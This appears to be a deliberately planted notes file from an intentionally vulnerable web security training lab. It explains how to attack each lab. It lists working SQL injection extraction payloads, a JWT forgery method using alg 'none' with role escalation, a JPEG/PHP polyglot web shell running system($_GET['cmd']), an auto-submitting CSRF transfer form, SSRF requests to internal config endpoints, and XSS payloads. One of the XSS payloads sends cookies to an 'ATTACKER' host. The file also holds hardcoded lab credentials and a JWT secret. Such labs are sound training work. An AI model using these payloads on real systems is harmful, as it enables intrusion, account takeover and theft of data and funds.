================================================================================
                         JOHN'S DEVELOPMENT NOTES
                      Internal Use Only - DO NOT SHARE
================================================================================

Last updated: 2026-03-01
Author: john@leaguesofcode.local

Hey, this is my personal notes file. If you're reading this, you probably
shouldn't be here... but since you are, maybe these notes will help you
understand our "secure" web platform better. ;)

================================================================================
                              DATABASE ACCESS
================================================================================

Production MySQL:
  Host: loc_db (internal Docker network)
  Port: 3306
  Database: leaguesofcode_db
  Username: locadmin
  Password: locpass123

Tables I know about:
  - users          -> Login credentials (plaintext passwords, oops)
  - members        -> Employee directory with sensitive info
  - secret_data    -> The "vault" - contains API keys, passwords
  - inventory      -> Product data
  - partners       -> Business partner info
  - books          -> Library system
  - accounts       -> JWT user accounts

SQL Query I use for testing:
  SELECT * FROM secret_data;

================================================================================
                           SQL INJECTION NOTES
================================================================================

The member search page (/members/) is a mess. I concatenate user input directly:
  $query = "SELECT * FROM members WHERE name LIKE '%$search%'";

Working payloads I tested:

  Basic bypass:
    ' OR 1=1-- -
    ' OR '1'='1

  UNION to find column count:
    ' UNION SELECT NULL-- -
    ' UNION SELECT NULL,NULL-- -
    ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -

  Extract secret_data (5 columns in members table):
    ' UNION SELECT 1,data_type,data_value,description,5 FROM secret_data-- -

  Get all table names:
    ' UNION SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema=database()-- -

  Get column names:
    ' UNION SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name='secret_data'-- -

Error-based (for /sqli/lab3):
  ' AND extractvalue(1,concat(0x7e,(SELECT data_value FROM secret_data LIMIT 1)))-- -
  ' AND updatexml(1,concat(0x7e,(SELECT data_value FROM secret_data LIMIT 1)),1)-- -

================================================================================
                              JWT NOTES
================================================================================

Our JWT implementation at /jwt/ has some... issues.

Secret Key (hardcoded, I know it's bad):
  sup3r_s3cr3t_jwt_k3y_2024

Algorithm: HS256

Token structure after login:
  Header:  {"alg":"HS256","typ":"JWT"}
  Payload: {"user_id":1,"username":"testuser","role":"user","iat":...,"exp":...}

Vulnerabilities I found:
  1. The secret key is weak and guessable
  2. Algorithm confusion - try changing alg to "none"
  3. Role is stored in token - change "user" to "administrator"

To forge a token:
  1. Decode the JWT (base64)
  2. Change "role":"user" to "role":"administrator"
  3. Change "alg":"HS256" to "alg":"none"
  4. Remove the signature (or re-sign with the secret above)
  5. Encode back to base64

Admin privileges give access to /jwt/dashboard.php admin panel.

Useful tool: jwt.io (for decoding/encoding)

================================================================================
                           FILE UPLOAD NOTES
================================================================================

Profile upload at /profile/ checks for JPEG files but...

The validation only checks:
  1. Content-Type header (easily spoofed)
  2. First 256 bytes for JPEG magic bytes

JPEG magic bytes: FF D8 FF E0 (or FF D8 FF E1 for EXIF)

Bypass technique - Polyglot file:
  1. Start with real JPEG header bytes
  2. Append PHP code after the header

  Example structure:
    [JPEG Header - 256+ bytes] + [PHP Code]

  The PHP code:
    <?php system($_GET['cmd']); ?>

  Or for a simple test:
    <?php echo "PWNED"; phpinfo(); ?>

Upload location: /profile/uploads/
Access your shell: /profile/uploads/yourfile.php.jpg?cmd=whoami

Note: The .php.jpg extension might work, or try .pHp or .php5

================================================================================
                              CSRF NOTES
================================================================================

The banking app at /share/ has no CSRF protection!

Transfer endpoint:
  POST /share/transfer
  Content-Type: application/x-www-form-urlencoded

  Parameters:
    - to_account: recipient account number
    - amount: transfer amount

Attack page template (host on /evil/):

  <html>
  <body onload="document.forms[0].submit()">
    <form action="http://TARGET/share/transfer" method="POST">
      <input type="hidden" name="to_account" value="ATTACKER_ACCOUNT">
      <input type="hidden" name="amount" value="1000">
    </form>
  </body>
  </html>

Test accounts:
  - alice / alice123 (has money)
  - bob / bob123 (attacker account)

The /evil/ page has a CSRF payload builder tool.

================================================================================
                              SSRF NOTES
================================================================================

The API fetcher at /api/ makes server-side requests.

Endpoint: /api/fetch?url=<URL>

Internal services running:
  - http://127.0.0.1:7070/           -> SSRF Lab main
  - http://127.0.0.1:7070/internal/  -> Restricted area
  - http://127.0.0.1:7070/internal/config -> JACKPOT! Has all secrets

The /internal/ path is blocked from external access but the server can reach it!

Payload:
  /api/fetch?url=http://127.0.0.1:7070/internal/config

Alternative internal IPs to try:
  - http://localhost:7070/internal/config
  - http://0.0.0.0:7070/internal/config
  - http://[::1]:7070/internal/config (IPv6)

The config endpoint returns database creds and API keys in JSON.

================================================================================
                              XSS NOTES
================================================================================

Search page at /search/ reflects input without encoding.

Vulnerable parameter: q (search query)
  /search/?q=<script>alert(1)</script>

Some payloads that work:

  Basic:
    <script>alert(document.domain)</script>

  If script tags are filtered:
    <img src=x onerror=alert(1)>
    <svg onload=alert(1)>
    <body onload=alert(1)>

  Cookie stealer:
    <img src=x onerror="fetch('http://ATTACKER/?c='+document.cookie)">

  DOM manipulation:
    <img src=x onerror="document.body.innerHTML='<h1>HACKED</h1>'">

The search results page includes the query in:
  1. The search box value
  2. The "Results for: X" heading
  3. The URL parameter

================================================================================
                           QUICK REFERENCE
================================================================================

| Lab          | Path       | Vulnerability        | Key Info                |
|--------------|------------|----------------------|-------------------------|
| SQL Injection| /members/  | Direct concatenation | 5 columns, secret_data  |
| SQL Labs     | /sqli/     | Various SQLi types   | Login bypass, UNION     |
| JWT          | /jwt/      | Weak secret, none alg| Secret: sup3r_s3cr3t... |
| File Upload  | /profile/  | Header-only check    | JPEG polyglot           |
| CSRF         | /share/    | No CSRF token        | POST /transfer          |
| SSRF         | /api/      | URL fetch            | 127.0.0.1:7070/internal |
| XSS          | /search/   | Reflected, no encode | img onerror works       |

================================================================================
                           HOW YOU GOT HERE
================================================================================

If you're reading this, you exploited weak SSH permissions:
  1. Logged in as noob (password: noob)
  2. Found /home/john/.ssh was world-writable (777)
  3. Wrote your public key to my authorized_keys
  4. SSH'd as me using your private key

This worked because:
  - StrictModes is disabled in sshd_config
  - My .ssh directory has wrong permissions
  - Password auth is disabled, but key auth works!

Good job! Now use these notes to pwn the web labs.

================================================================================
                              GOOD LUCK!
================================================================================

Remember: These are INTENTIONALLY vulnerable for training.
Never do this stuff on real systems without permission!

- John
================================================================================
